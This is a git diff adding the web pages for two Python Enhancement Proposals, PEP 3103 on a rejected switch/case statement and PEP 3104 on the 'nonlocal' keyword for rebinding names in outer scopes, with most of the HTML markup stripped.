+ + + + + \ No newline at end of file diff --git a/pep-3103/index.html b/pep-3103/index.html new file mode 100644 index 00000000000..23cda7f0daf --- /dev/null +++ b/pep-3103/index.html @@ -0,0 +1,733 @@ + + + + + + + + PEP 3103 – A Switch/Case Statement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3103 – A Switch/Case Statement

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Jun-2006
+
Python-Version:
+
3.0
+
Post-History:
+
26-Jun-2006
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

A quick poll during my keynote presentation at PyCon 2007 shows this +proposal has no popular support. I therefore reject it.

+
+
+

Abstract

+

Python-dev has recently seen a flurry of discussion on adding a switch +statement. In this PEP I’m trying to extract my own preferences from +the smorgasbord of proposals, discussing alternatives and explaining +my choices where I can. I’ll also indicate how strongly I feel about +alternatives I discuss.

+

This PEP should be seen as an alternative to PEP 275. My views are +somewhat different from that PEP’s author, but I’m grateful for the +work done in that PEP.

+

This PEP introduces canonical names for the many variants that have +been discussed for different aspects of the syntax and semantics, such +as “alternative 1”, “school II”, “option 3” and so on. Hopefully +these names will help the discussion.

+
+
+

Rationale

+

A common programming idiom is to consider an expression and do +different things depending on its value. This is usually done with a +chain of if/elif tests; I’ll refer to this form as the “if/elif +chain”. There are two main motivations to want to introduce new +syntax for this idiom:

+
    +
  • It is repetitive: the variable and the test operator, usually ‘==’ +or ‘in’, are repeated in each if/elif branch.
  • +
  • It is inefficient: when an expression matches the last test value +(or no test value at all) it is compared to each of the preceding +test values.
  • +
+

Both of these complaints are relatively mild; there isn’t a lot of +readability or performance to be gained by writing this differently. +Yet, some kind of switch statement is found in many languages and it +is not unreasonable to expect that its addition to Python will allow +us to write up certain code more cleanly and efficiently than before.

+

There are forms of dispatch that are not suitable for the proposed +switch statement; for example, when the number of cases is not +statically known, or when it is desirable to place the code for +different cases in different classes or files.

+
+
+

Basic Syntax

+

I’m considering several variants of the syntax first proposed in PEP +275 here. There are lots of other possibilities, but I don’t see that +they add anything.

+

I’ve recently been converted to alternative 1.

+

I should note that all alternatives here have the “implicit break” +property: at the end of the suite for a particular case, the control +flow jumps to the end of the whole switch statement. There is no way +to pass control from one case to another. This in contrast to C, +where an explicit ‘break’ statement is required to prevent falling +through to the next case.

+

In all alternatives, the else-suite is optional. It is more Pythonic +to use ‘else’ here rather than introducing a new reserved word, +‘default’, as in C.

+

Semantics are discussed in the next top-level section.

+
+

Alternative 1

+

This is the preferred form in PEP 275:

+
switch EXPR:
+    case EXPR:
+        SUITE
+    case EXPR:
+        SUITE
+    ...
+    else:
+        SUITE
+
+
+

The main downside is that the suites where all the action is are +indented two levels deep; this can be remedied by indenting the cases +“half a level” (e.g. 2 spaces if the general indentation level is 4).

+
+
+

Alternative 2

+

This is Fredrik Lundh’s preferred form; it differs by not indenting +the cases:

+
switch EXPR:
+case EXPR:
+    SUITE
+case EXPR:
+    SUITE
+....
+else:
+    SUITE
+
+
+

Some reasons not to choose this include expected difficulties for +auto-indenting editors, folding editors, and the like; and confused +users. There are no situations currently in Python where a line +ending in a colon is followed by an unindented line.

+
+
+

Alternative 3

+

This is the same as alternative 2 but leaves out the colon after the +switch:

+
switch EXPR
+case EXPR:
+    SUITE
+case EXPR:
+    SUITE
+....
+else:
+    SUITE
+
+
+

The hope of this alternative is that it will not upset the auto-indent +logic of the average Python-aware text editor less. But it looks +strange to me.

+
+
+

Alternative 4

+

This leaves out the ‘case’ keyword on the basis that it is redundant:

+
switch EXPR:
+    EXPR:
+        SUITE
+    EXPR:
+        SUITE
+    ...
+    else:
+        SUITE
+
+
+

Unfortunately now we are forced to indent the case expressions, +because otherwise (at least in the absence of an ‘else’ keyword) the +parser would have a hard time distinguishing between an unindented +case expression (which continues the switch statement) or an unrelated +statement that starts like an expression (such as an assignment or a +procedure call). The parser is not smart enough to backtrack once it +sees the colon. This is my least favorite alternative.

+
+
+
+

Extended Syntax

+

There is one additional concern that needs to be addressed +syntactically. Often two or more values need to be treated the same. +In C, this done by writing multiple case labels together without any +code between them. The “fall through” semantics then mean that these +are all handled by the same code. Since the Python switch will not +have fall-through semantics (which have yet to find a champion) we +need another solution. Here are some alternatives.

+
+

Alternative A

+

Use:

+
case EXPR:
+
+
+

to match on a single expression; use:

+
case EXPR, EXPR, ...:
+
+
+

to match on multiple expressions. The is interpreted so that if EXPR +is a parenthesized tuple or another expression whose value is a tuple, +the switch expression must equal that tuple, not one of its elements. +This means that we cannot use a variable to indicate multiple cases. +While this is also true in C’s switch statement, it is a relatively +common occurrence in Python (see for example sre_compile.py).

+
+
+

Alternative B

+

Use:

+
case EXPR:
+
+
+

to match on a single expression; use:

+
case in EXPR_LIST:
+
+
+

to match on multiple expressions. If EXPR_LIST is a single +expression, the ‘in’ forces its interpretation as an iterable (or +something supporting __contains__, in a minority semantics +alternative). If it is multiple expressions, each of those is +considered for a match.

+
+
+

Alternative C

+

Use:

+
case EXPR:
+
+
+

to match on a single expression; use:

+
case EXPR, EXPR, ...:
+
+
+

to match on multiple expressions (as in alternative A); and use:

+
case *EXPR:
+
+
+

to match on the elements of an expression whose value is an iterable. +The latter two cases can be combined, so that the true syntax is more +like this:

+
case [*]EXPR, [*]EXPR, ...:
+
+
+

The * notation is similar to the use of prefix * already in use for +variable-length parameter lists and for passing computed argument +lists, and often proposed for value-unpacking (e.g. a, b, *c = X as +an alternative to (a, b), c = X[:2], X[2:]).

+
+
+

Alternative D

+

This is a mixture of alternatives B and C; the syntax is like +alternative B but instead of the ‘in’ keyword it uses ‘*’. This is +more limited, but still allows the same flexibility. It uses:

+
case EXPR:
+
+
+

to match on a single expression and:

+
case *EXPR:
+
+
+

to match on the elements of an iterable. If one wants to specify +multiple matches in one case, one can write this:

+
case *(EXPR, EXPR, ...):
+
+
+

or perhaps this (although it’s a bit strange because the relative +priority of ‘*’ and ‘,’ is different than elsewhere):

+
case * EXPR, EXPR, ...:
+
+
+
+
+

Discussion

+

Alternatives B, C and D are motivated by the desire to specify +multiple cases with the same treatment using a variable representing a +set (usually a tuple) rather than spelling them out. The motivation +for this is usually that if one has several switches over the same set +of cases it’s a shame to have to spell out all the alternatives each +time. An additional motivation is to be able to specify ranges to +be matched easily and efficiently, similar to Pascal’s “1..1000:” +notation. At the same time we want to prevent the kind of mistake +that is common in exception handling (and which will be addressed in +Python 3000 by changing the syntax of the except clause): writing +“case 1, 2:” where “case (1, 2):” was meant, or vice versa.

+

The case could be made that the need is insufficient for the added +complexity; C doesn’t have a way to express ranges either, and it’s +used a lot more than Pascal these days. Also, if a dispatch method +based on dict lookup is chosen as the semantics, large ranges could be +inefficient (consider range(1, sys.maxint)).

+

All in all my preferences are (from most to least favorite) B, A, D’, +C, where D’ is D without the third possibility.

+
+
+
+

Semantics

+

There are several issues to review before we can choose the right +semantics.

+
+

If/Elif Chain vs. Dict-based Dispatch

+

There are several main schools of thought about the switch statement’s +semantics:

+
    +
  • School I wants to define the switch statement in term of an +equivalent if/elif chain (possibly with some optimization thrown +in).
  • +
  • School II prefers to think of it as a dispatch on a precomputed +dict. There are different choices for when the precomputation +happens.
  • +
  • There’s also school III, which agrees with school I that the +definition of a switch statement should be in terms of an equivalent +if/elif chain, but concedes to the optimization camp that all +expressions involved must be hashable.
  • +
+

We need to further separate school I into school Ia and school Ib:

+
    +
  • School Ia has a simple position: a switch statement is translated to +an equivalent if/elif chain, and that’s that. It should not be +linked to optimization at all. That is also my main objection +against this school: without any hint of optimization, the switch +statement isn’t attractive enough to warrant new syntax.
  • +
  • School Ib has a more complex position: it agrees with school II that +optimization is important, and is willing to concede the compiler +certain liberties to allow this. (For example, PEP 275 Solution 1.) +In particular, hash() of the switch and case expressions may or may +not be called (so it should be side-effect-free); and the case +expressions may not be evaluated each time as expected by the +if/elif chain behavior, so the case expressions should also be +side-effect free. My objection to this (elaborated below) is that +if either the hash() or the case expressions aren’t +side-effect-free, optimized and unoptimized code may behave +differently.
  • +
+

School II grew out of the realization that optimization of commonly +found cases isn’t so easy, and that it’s better to face this head on. +This will become clear below.

+

The differences between school I (mostly school Ib) and school II are +threefold:

+
    +
  • When optimizing using a dispatch dict, if either the switch +expression or the case expressions are unhashable (in which case +hash() raises an exception), school Ib requires catching the hash() +failure and falling back to an if/elif chain. School II simply lets +the exception happen. The problem with catching an exception in +hash() as required by school Ib, is that this may hide a genuine +bug. A possible way out is to only use a dispatch dict if all case +expressions are ints, strings or other built-ins with known good +hash behavior, and to only attempt to hash the switch expression if +it is also one of those types. Type objects should probably also be +supported here. This is the (only) problem that school III +addresses.
  • +
  • When optimizing using a dispatch dict, if the hash() function of any +expression involved returns an incorrect value, under school Ib, +optimized code will not behave the same as unoptimized code. This +is a well-known problem with optimization-related bugs, and waste +lots of developer time. Under school II, in this situation +incorrect results are produced at least consistently, which should +make debugging a bit easier. The way out proposed for the previous +bullet would also help here.
  • +
  • School Ib doesn’t have a good optimization strategy if the case +expressions are named constants. The compiler cannot know their +values for sure, and it cannot know whether they are truly constant. +As a way out, it has been proposed to re-evaluate the expression +corresponding to the case once the dict has identified which case +should be taken, to verify that the value of the expression didn’t +change. But strictly speaking, all the case expressions occurring +before that case would also have to be checked, in order to preserve +the true if/elif chain semantics, thereby completely killing the +optimization. Another proposed solution is to have callbacks +notifying the dispatch dict of changes in the value of variables or +attributes involved in the case expressions. But this is not likely +implementable in the general case, and would require many namespaces +to bear the burden of supporting such callbacks, which currently +don’t exist at all.
  • +
  • Finally, there’s a difference of opinion regarding the treatment of +duplicate cases (i.e. two or more cases with match expressions that +evaluates to the same value). School I wants to treat this the same +is an if/elif chain would treat it (i.e. the first match wins and +the code for the second match is silently unreachable); school II +wants this to be an error at the time the dispatch dict is frozen +(so dead code doesn’t go undiagnosed).
  • +
+

School I sees trouble in school II’s approach of pre-freezing a +dispatch dict because it places a new and unusual burden on +programmers to understand exactly what kinds of case values are +allowed to be frozen and when the case values will be frozen, or they +might be surprised by the switch statement’s behavior.

+

School II doesn’t believe that school Ia’s unoptimized switch is worth +the effort, and it sees trouble in school Ib’s proposal for +optimization, which can cause optimized and unoptimized code to behave +differently.

+

In addition, school II sees little value in allowing cases involving +unhashable values; after all if the user expects such values, they can +just as easily write an if/elif chain. School II also doesn’t believe +that it’s right to allow dead code due to overlapping cases to occur +unflagged, when the dict-based dispatch implementation makes it so +easy to trap this.

+

However, there are some use cases for overlapping/duplicate cases. +Suppose you’re switching on some OS-specific constants (e.g. exported +by the os module or some module like that). You have a case for each. +But on some OS, two different constants have the same value (since on +that OS they are implemented the same way – like O_TEXT and O_BINARY +on Unix). If duplicate cases are flagged as errors, your switch +wouldn’t work at all on that OS. It would be much better if you could +arrange the cases so that one case has preference over another.

+

There’s also the (more likely) use case where you have a set of cases +to be treated the same, but one member of the set must be treated +differently. It would be convenient to put the exception in an +earlier case and be done with it.

+

(Yes, it seems a shame not to be able to diagnose dead code due to +accidental case duplication. Maybe that’s less important, and +pychecker can deal with it? After all we don’t diagnose duplicate +method definitions either.)

+

This suggests school IIb: like school II but redundant cases must be +resolved by choosing the first match. This is trivial to implement +when building the dispatch dict (skip keys already present).

+

(An alternative would be to introduce new syntax to indicate “okay to +have overlapping cases” or “ok if this case is dead code” but I find +that overkill.)

+

Personally, I’m in school II: I believe that the dict-based dispatch +is the one true implementation for switch statements and that we +should face the limitations up front, so that we can reap maximal +benefits. I’m leaning towards school IIb – duplicate cases should be +resolved by the ordering of the cases instead of flagged as errors.

+
+
+

When to Freeze the Dispatch Dict

+

For the supporters of school II (dict-based dispatch), the next big +dividing issue is when to create the dict used for switching. I call +this “freezing the dict”.

+

The main problem that makes this interesting is the observation that +Python doesn’t have named compile-time constants. What is +conceptually a constant, such as re.IGNORECASE, is a variable to the +compiler, and there’s nothing to stop crooked code from modifying its +value.

+
+

Option 1

+

The most limiting option is to freeze the dict in the compiler. This +would require that the case expressions are all literals or +compile-time expressions involving only literals and operators whose +semantics are known to the compiler, since with the current state of +Python’s dynamic semantics and single-module compilation, there is no +hope for the compiler to know with sufficient certainty the values of +any variables occurring in such expressions. This is widely though +not universally considered too restrictive.

+

Raymond Hettinger is the main advocate of this approach. He proposes +a syntax where only a single literal of certain types is allowed as +the case expression. It has the advantage of being unambiguous and +easy to implement.

+

My main complaint about this is that by disallowing “named constants” +we force programmers to give up good habits. Named constants are +introduced in most languages to solve the problem of “magic numbers” +occurring in the source code. For example, sys.maxint is a lot more +readable than 2147483647. Raymond proposes to use string literals +instead of named “enums”, observing that the string literal’s content +can be the name that the constant would otherwise have. Thus, we +could write “case ‘IGNORECASE’:” instead of “case re.IGNORECASE:”. +However, if there is a spelling error in the string literal, the case +will silently be ignored, and who knows when the bug is detected. If +there is a spelling error in a NAME, however, the error will be caught +as soon as it is evaluated. Also, sometimes the constants are +externally defined (e.g. when parsing a file format like JPEG) and we +can’t easily choose appropriate string values. Using an explicit +mapping dict sounds like a poor hack.

+
+
+

Option 2

+

The oldest proposal to deal with this is to freeze the dispatch dict +the first time the switch is executed. At this point we can assume +that all the named “constants” (constant in the programmer’s mind, +though not to the compiler) used as case expressions are defined – +otherwise an if/elif chain would have little chance of success either. +Assuming the switch will be executed many times, doing some extra work +the first time pays back quickly by very quick dispatch times later.

+

An objection to this option is that there is no obvious object where +the dispatch dict can be stored. It can’t be stored on the code +object, which is supposed to be immutable; it can’t be stored on the +function object, since many function objects may be created for the +same function (e.g. for nested functions). In practice, I’m sure that +something can be found; it could be stored in a section of the code +object that’s not considered when comparing two code objects or when +pickling or marshalling a code object; or all switches could be stored +in a dict indexed by weak references to code objects. The solution +should also be careful not to leak switch dicts between multiple +interpreters.

+

Another objection is that the first-use rule allows obfuscated code +like this:

+
def foo(x, y):
+    switch x:
+    case y:
+        print 42
+
+
+

To the untrained eye (not familiar with Python) this code would be +equivalent to this:

+
def foo(x, y):
+    if x == y:
+        print 42
+
+
+

but that’s not what it does (unless it is always called with the same +value as the second argument). This has been addressed by suggesting +that the case expressions should not be allowed to reference local +variables, but this is somewhat arbitrary.

+

A final objection is that in a multi-threaded application, the +first-use rule requires intricate locking in order to guarantee the +correct semantics. (The first-use rule suggests a promise that side +effects of case expressions are incurred exactly once.) This may be +as tricky as the import lock has proved to be, since the lock has to +be held while all the case expressions are being evaluated.

+
+
+

Option 3

+

A proposal that has been winning support (including mine) is to freeze +a switch’s dict when the innermost function containing it is defined. +The switch dict is stored on the function object, just as parameter +defaults are, and in fact the case expressions are evaluated at the +same time and in the same scope as the parameter defaults (i.e. in the +scope containing the function definition).

+

This option has the advantage of avoiding many of the finesses needed +to make option 2 work: there’s no need for locking, no worry about +immutable code objects or multiple interpreters. It also provides a +clear explanation for why locals can’t be referenced in case +expressions.

+

This option works just as well for situations where one would +typically use a switch; case expressions involving imported or global +named constants work exactly the same way as in option 2, as long as +they are imported or defined before the function definition is +encountered.

+

A downside however is that the dispatch dict for a switch inside a +nested function must be recomputed each time the nested function is +defined. For certain “functional” styles of programming this may make +switch unattractive in nested functions. (Unless all case expressions +are compile-time constants; then the compiler is of course free to +optimize away the switch freezing code and make the dispatch table part +of the code object.)

+

Another downside is that under this option, there’s no clear moment +when the dispatch dict is frozen for a switch that doesn’t occur +inside a function. There are a few pragmatic choices for how to treat +a switch outside a function:

+
    +
  1. Disallow it.
  2. +
  3. Translate it into an if/elif chain.
  4. +
  5. Allow only compile-time constant expressions.
  6. +
  7. Compute the dispatch dict each time the switch is reached.
  8. +
  9. Like (b) but tests that all expressions evaluated are hashable.
  10. +
+

Of these, (a) seems too restrictive: it’s uniformly worse than (c); +and (d) has poor performance for little or no benefits compared to +(b). It doesn’t make sense to have a performance-critical inner loop +at the module level, as all local variable references are slow there; +hence (b) is my (weak) favorite. Perhaps I should favor (e), which +attempts to prevent atypical use of a switch; examples that work +interactively but not in a function are annoying. In the end I don’t +think this issue is all that important (except it must be resolved +somehow) and am willing to leave it up to whoever ends up implementing +it.

+

When a switch occurs in a class but not in a function, we can freeze +the dispatch dict at the same time the temporary function object +representing the class body is created. This means the case +expressions can reference module globals but not class variables. +Alternatively, if we choose (b) above, we could choose this +implementation inside a class definition as well.

+
+
+

Option 4

+

There are a number of proposals to add a construct to the language +that makes the concept of a value pre-computed at function definition +time generally available, without tying it either to parameter default +values or case expressions. Some keywords proposed include ‘const’, +‘static’, ‘only’ or ‘cached’. The associated syntax and semantics +vary.

+

These proposals are out of scope for this PEP, except to suggest that +if such a proposal is accepted, there are two ways for the switch to +benefit: we could require case expressions to be either compile-time +constants or pre-computed values; or we could make pre-computed values +the default (and only) evaluation mode for case expressions. The +latter would be my preference, since I don’t see a use for more +dynamic case expressions that isn’t addressed adequately by writing an +explicit if/elif chain.

+
+
+
+
+

Conclusion

+

It is too early to decide. I’d like to see at least one completed +proposal for pre-computed values before deciding. In the meantime, +Python is fine without a switch statement, and perhaps those who claim +it would be a mistake to add one are right.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3103.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3104/index.html b/pep-3104/index.html new file mode 100644 index 00000000000..68466f19999 --- /dev/null +++ b/pep-3104/index.html @@ -0,0 +1,706 @@ + + + + + + + + PEP 3104 – Access to Names in Outer Scopes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3104 – Access to Names in Outer Scopes

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Oct-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

In most languages that support nested scopes, code can refer to or +rebind (assign to) any name in the nearest enclosing scope. +Currently, Python code can refer to a name in any enclosing scope, +but it can only rebind names in two scopes: the local scope (by +simple assignment) or the module-global scope (using a global +declaration).

+

This limitation has been raised many times on the Python-Dev mailing +list and elsewhere, and has led to extended discussion and many +proposals for ways to remove this limitation. This PEP summarizes +the various alternatives that have been suggested, together with +advantages and disadvantages that have been mentioned for each.

+
+
+

Rationale

+

Before version 2.1, Python’s treatment of scopes resembled that of +standard C: within a file there were only two levels of scope, global +and local. In C, this is a natural consequence of the fact that +function definitions cannot be nested. But in Python, though +functions are usually defined at the top level, a function definition +can be executed anywhere. This gave Python the syntactic appearance +of nested scoping without the semantics, and yielded inconsistencies +that were surprising to some programmers – for example, a recursive +function that worked at the top level would cease to work when moved +inside another function, because the recursive function’s own name +would no longer be visible in its body’s scope. This violates the +intuition that a function should behave consistently when placed in +different contexts. Here’s an example:

+
def enclosing_function():
+    def factorial(n):
+        if n < 2:
+            return 1
+        return n * factorial(n - 1)  # fails with NameError
+    print factorial(5)
+
+
+

Python 2.1 moved closer to static nested scoping by making visible +the names bound in all enclosing scopes (see PEP 227). This change +makes the above code example work as expected. However, because any +assignment to a name implicitly declares that name to be local, it is +impossible to rebind a name in an outer scope (except when a +global declaration forces the name to be global). Thus, the +following code, intended to display a number that can be incremented +and decremented by clicking buttons, doesn’t work as someone familiar +with lexical scoping might expect:

+
def make_scoreboard(frame, score=0):
+    label = Label(frame)
+    label.pack()
+    for i in [-10, -1, 1, 10]:
+        def increment(step=i):
+            score = score + step  # fails with UnboundLocalError
+            label['text'] = score
+        button = Button(frame, text='%+d' % i, command=increment)
+        button.pack()
+    return label
+
+
+

Python syntax doesn’t provide a way to indicate that the name +score mentioned in increment refers to the variable score +bound in make_scoreboard, not a local variable in increment. +Users and developers of Python have expressed an interest in removing +this limitation so that Python can have the full flexibility of the +Algol-style scoping model that is now standard in many programming +languages, including JavaScript, Perl, Ruby, Scheme, Smalltalk, +C with GNU extensions, and C# 2.0.

+

It has been argued that such a feature isn’t necessary, because +a rebindable outer variable can be simulated by wrapping it in a +mutable object:

+
class Namespace:
+    pass
+
+def make_scoreboard(frame, score=0):
+    ns = Namespace()
+    ns.score = 0
+    label = Label(frame)
+    label.pack()
+    for i in [-10, -1, 1, 10]:
+        def increment(step=i):
+            ns.score = ns.score + step
+            label['text'] = ns.score
+        button = Button(frame, text='%+d' % i, command=increment)
+        button.pack()
+    return label
+
+
+

However, this workaround only highlights the shortcomings of existing +scopes: the purpose of a function is to encapsulate code in its own +namespace, so it seems unfortunate that the programmer should have to +create additional namespaces to make up for missing functionality in +the existing local scopes, and then have to decide whether each name +should reside in the real scope or the simulated scope.

+

Another common objection is that the desired functionality can be +written as a class instead, albeit somewhat more verbosely. One +rebuttal to this objection is that the existence of a different +implementation style is not a reason to leave a supported programming +construct (nested scopes) functionally incomplete. Python is +sometimes called a “multi-paradigm language” because it derives so +much strength, practical flexibility, and pedagogical power from its +support and graceful integration of multiple programming paradigms.

+

A proposal for scoping syntax appeared on Python-Dev as far back as +1994 [1], long before PEP 227’s support for nested scopes was +adopted. At the time, Guido’s response was:

+
+
This is dangerously close to introducing CSNS [classic static +nested scopes]. If you were to do so, your proposed semantics +of scoped seem alright. I still think there is not enough need +for CSNS to warrant this kind of construct …
+

After PEP 227, the “outer name rebinding discussion” has reappeared +on Python-Dev enough times that it has become a familiar event, +having recurred in its present form since at least 2003 [2]. +Although none of the language changes proposed in these discussions +have yet been adopted, Guido has acknowledged that a language change +is worth considering [12].

+
+
+

Other Languages

+

To provide some background, this section describes how some other +languages handle nested scopes and rebinding.

+
+

JavaScript, Perl, Scheme, Smalltalk, GNU C, C# 2.0

+

These languages use variable declarations to indicate scope. In +JavaScript, a lexically scoped variable is declared with the var +keyword; undeclared variable names are assumed to be global. In +Perl, a lexically scoped variable is declared with the my +keyword; undeclared variable names are assumed to be global. In +Scheme, all variables must be declared (with define or let, +or as formal parameters). In Smalltalk, any block can begin by +declaring a list of local variable names between vertical bars. +C and C# require type declarations for all variables. For all these +cases, the variable belongs to the scope containing the declaration.

+
+
+

Ruby (as of 1.8)

+

Ruby is an instructive example because it appears to be the only +other currently popular language that, like Python, tries to support +statically nested scopes without requiring variable declarations, and +thus has to come up with an unusual solution. Functions in Ruby can +contain other function definitions, and they can also contain code +blocks enclosed in curly braces. Blocks have access to outer +variables, but nested functions do not. Within a block, an +assignment to a name implies a declaration of a local variable only +if it would not shadow a name already bound in an outer scope; +otherwise assignment is interpreted as rebinding of the outer name. +Ruby’s scoping syntax and rules have also been debated at great +length, and changes seem likely in Ruby 2.0 [28].

+
+
+
+

Overview of Proposals

+

There have been many different proposals on Python-Dev for ways to +rebind names in outer scopes. They all fall into two categories: +new syntax in the scope where the name is bound, or new syntax in +the scope where the name is used.

+
+

New Syntax in the Binding (Outer) Scope

+
+

Scope Override Declaration

+

The proposals in this category all suggest a new kind of declaration +statement similar to JavaScript’s var. A few possible keywords +have been proposed for this purpose:

+ +

In all these proposals, a declaration such as var x in a +particular scope S would cause all references to x in scopes +nested within S to refer to the x bound in S.

+

The primary objection to this category of proposals is that the +meaning of a function definition would become context-sensitive. +Moving a function definition inside some other block could cause any +of the local name references in the function to become nonlocal, due +to declarations in the enclosing block. For blocks in Ruby 1.8, +this is actually the case; in the following example, the two setters +have different effects even though they look identical:

+
setter1 = proc { | x | y = x }      # y is local here
+y = 13
+setter2 = proc { | x | y = x }      # y is nonlocal here
+setter1.call(99)
+puts y                              # prints 13
+setter2.call(77)
+puts y                              # prints 77
+
+
+

Note that although this proposal resembles declarations in JavaScript +and Perl, the effect on the language is different because in those +languages undeclared variables are global by default, whereas in +Python undeclared variables are local by default. Thus, moving +a function inside some other block in JavaScript or Perl can only +reduce the scope of a previously global name reference, whereas in +Python with this proposal, it could expand the scope of a previously +local name reference.

+
+
+

Required Variable Declaration

+

A more radical proposal [21] suggests removing Python’s scope-guessing +convention altogether and requiring that all names be declared in the +scope where they are to be bound, much like Scheme. With this +proposal, var x = 3 would both declare x to belong to the +local scope and bind it, where as x = 3 would rebind the existing +visible x. In a context without an enclosing scope containing a +var x declaration, the statement x = 3 would be statically +determined to be illegal.

+

This proposal yields a simple and consistent model, but it would be +incompatible with all existing Python code.

+
+
+
+

New Syntax in the Referring (Inner) Scope

+

There are three kinds of proposals in this category.

+
+

Outer Reference Expression

+

This type of proposal suggests a new way of referring to a variable +in an outer scope when using the variable in an expression. One +syntax that has been suggested for this is .x [7], which would +refer to x without creating a local binding for it. A concern +with this proposal is that in many contexts x and .x could +be used interchangeably, which would confuse the reader [31]. A +closely related idea is to use multiple dots to specify the number +of scope levels to ascend [8], but most consider this too error-prone +[17].

+
+
+

Rebinding Operator

+

This proposal suggests a new assignment-like operator that rebinds +a name without declaring the name to be local [2]. Whereas the +statement x = 3 both declares x a local variable and binds +it to 3, the statement x := 3 would change the existing binding +of x without declaring it local.

+

This is a simple solution, but according to PEP 3099 it has been +rejected (perhaps because it would be too easy to miss or to confuse +with =).

+
+
+

Scope Override Declaration

+

The proposals in this category suggest a new kind of declaration +statement in the inner scope that prevents a name from becoming +local. This statement would be similar in nature to the global +statement, but instead of making the name refer to a binding in the +top module-level scope, it would make the name refer to the binding +in the nearest enclosing scope.

+

This approach is attractive due to its parallel with a familiar +Python construct, and because it retains context-independence for +function definitions.

+

This approach also has advantages from a security and debugging +perspective. The resulting Python would not only match the +functionality of other nested-scope languages but would do so with a +syntax that is arguably even better for defensive programming. In +most other languages, a declaration contracts the scope of an +existing name, so inadvertently omitting the declaration could yield +farther-reaching (i.e. more dangerous) effects than expected. In +Python with this proposal, the extra effort of adding the declaration +is aligned with the increased risk of non-local effects (i.e. the +path of least resistance is the safer path).

+

Many spellings have been suggested for such a declaration:

+
    +
  • scoped x [1]
  • +
  • global x in f [3] (explicitly specify which scope)
  • +
  • free x [5]
  • +
  • outer x [6]
  • +
  • use x [9]
  • +
  • global x [10] (change the meaning of global)
  • +
  • nonlocal x [11]
  • +
  • global x outer [18]
  • +
  • global in x [18]
  • +
  • not global x [18]
  • +
  • extern x [20]
  • +
  • ref x [22]
  • +
  • refer x [22]
  • +
  • share x [22]
  • +
  • sharing x [22]
  • +
  • common x [22]
  • +
  • using x [22]
  • +
  • borrow x [22]
  • +
  • reuse x [23]
  • +
  • scope f x [25] (explicitly specify which scope)
  • +
+

The most commonly discussed choices appear to be outer, +global, and nonlocal. outer is already used as both a +variable name and an attribute name in the standard library. The +word global has a conflicting meaning, because “global variable” +is generally understood to mean a variable with top-level scope [27]. +In C, the keyword extern means that a name refers to a variable +in a different compilation unit. While nonlocal is a bit long +and less pleasant-sounding than some of the other options, it does +have precisely the correct meaning: it declares a name not local.

+
+
+
+
+

Proposed Solution

+

The solution proposed by this PEP is to add a scope override +declaration in the referring (inner) scope. Guido has expressed a +preference for this category of solution on Python-Dev [14] and has +shown approval for nonlocal as the keyword [19].

+

The proposed declaration:

+
nonlocal x
+
+
+

prevents x from becoming a local name in the current scope. All +occurrences of x in the current scope will refer to the x +bound in an outer enclosing scope. As with global, multiple +names are permitted:

+
nonlocal x, y, z
+
+
+

If there is no pre-existing binding in an enclosing scope, the +compiler raises a SyntaxError. (It may be a bit of a stretch to +call this a syntax error, but so far SyntaxError is used for all +compile-time errors, including, for example, __future__ import +with an unknown feature name.) Guido has said that this kind of +declaration in the absence of an outer binding should be considered +an error [16].

+

If a nonlocal declaration collides with the name of a formal +parameter in the local scope, the compiler raises a SyntaxError.

+

A shorthand form is also permitted, in which nonlocal is +prepended to an assignment or augmented assignment:

+
nonlocal x = 3
+
+
+

The above has exactly the same meaning as nonlocal x; x = 3. +(Guido supports a similar form of the global statement [24].)

+

On the left side of the shorthand form, only identifiers are allowed, +not target expressions like x[0]. Otherwise, all forms of +assignment are allowed. The proposed grammar of the nonlocal +statement is:

+
nonlocal_stmt ::=
+    "nonlocal" identifier ("," identifier)*
+               ["=" (target_list "=")+ expression_list]
+  | "nonlocal" identifier augop expression_list
+
+
+

The rationale for allowing all these forms of assignment is that it +simplifies understanding of the nonlocal statement. Separating +the shorthand form into a declaration and an assignment is sufficient +to understand what it means and whether it is valid.

+
+

Note

+

The shorthand syntax was not added in the original implementation +of the PEP. Later discussions [29] [30] concluded this syntax +should not be implemented.

+
+
+
+

Backward Compatibility

+

This PEP targets Python 3000, as suggested by Guido [19]. However, +others have noted that some options considered in this PEP may be +small enough changes to be feasible in Python 2.x [26], in which +case this PEP could possibly be moved to be a 2.x series PEP.

+

As a (very rough) measure of the impact of introducing a new keyword, +here is the number of times that some of the proposed keywords appear +as identifiers in the standard library, according to a scan of the +Python SVN repository on November 5, 2006:

+
nonlocal    0
+use         2
+using       3
+reuse       4
+free        8
+outer     147
+
+
+

global appears 214 times as an existing keyword. As a measure +of the impact of using global as the outer-scope keyword, there +are 18 files in the standard library that would break as a result +of such a change (because a function declares a variable global +before that variable has been introduced in the global scope):

+
cgi.py
+dummy_thread.py
+mhlib.py
+mimetypes.py
+idlelib/PyShell.py
+idlelib/run.py
+msilib/__init__.py
+test/inspect_fodder.py
+test/test_compiler.py
+test/test_decimal.py
+test/test_descr.py
+test/test_dummy_threading.py
+test/test_fileinput.py
+test/test_global.py (not counted: this tests the keyword itself)
+test/test_grammar.py (not counted: this tests the keyword itself)
+test/test_itertools.py
+test/test_multifile.py
+test/test_scope.py (not counted: this tests the keyword itself)
+test/test_threaded_import.py
+test/test_threadsignals.py
+test/test_warnings.py
+
+
+
+
+

References

+ +

[15] Explicit Lexical Scoping (pre-PEP?) (Guido van Rossum) + https://mail.python.org/pipermail/python-dev/2006-July/066995.html

+ +
+
+

Acknowledgements

+

